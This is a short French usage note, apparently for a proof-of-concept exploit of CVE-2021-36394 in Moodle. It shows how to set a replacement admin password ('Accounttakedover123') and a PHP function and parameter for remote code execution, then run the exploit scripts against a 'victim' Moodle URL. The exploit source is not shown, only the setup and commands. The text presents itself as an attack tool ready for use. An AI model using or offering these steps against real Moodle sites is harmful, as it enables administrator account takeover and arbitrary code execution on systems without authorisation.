
Preuve de concept d'exploitation pour CVE-2021-36394 dans Moodle, permettant la prise de contrôle du mot de passe administrateur et l'exécution de code à distance via des fonctions PHP personnalisées.
Code personnalisé
$newpassword = "Accounttakedover123";
Puis exécutez :
$ CVE2021-36394.php http://victim/path_to_moodle
Code personnalisé
$function = "header"; $param = "Hacked: by0d0ff9";
Puis exécutez :
$ CVE2021-36394_RCE.php http://victim/path_to_moodle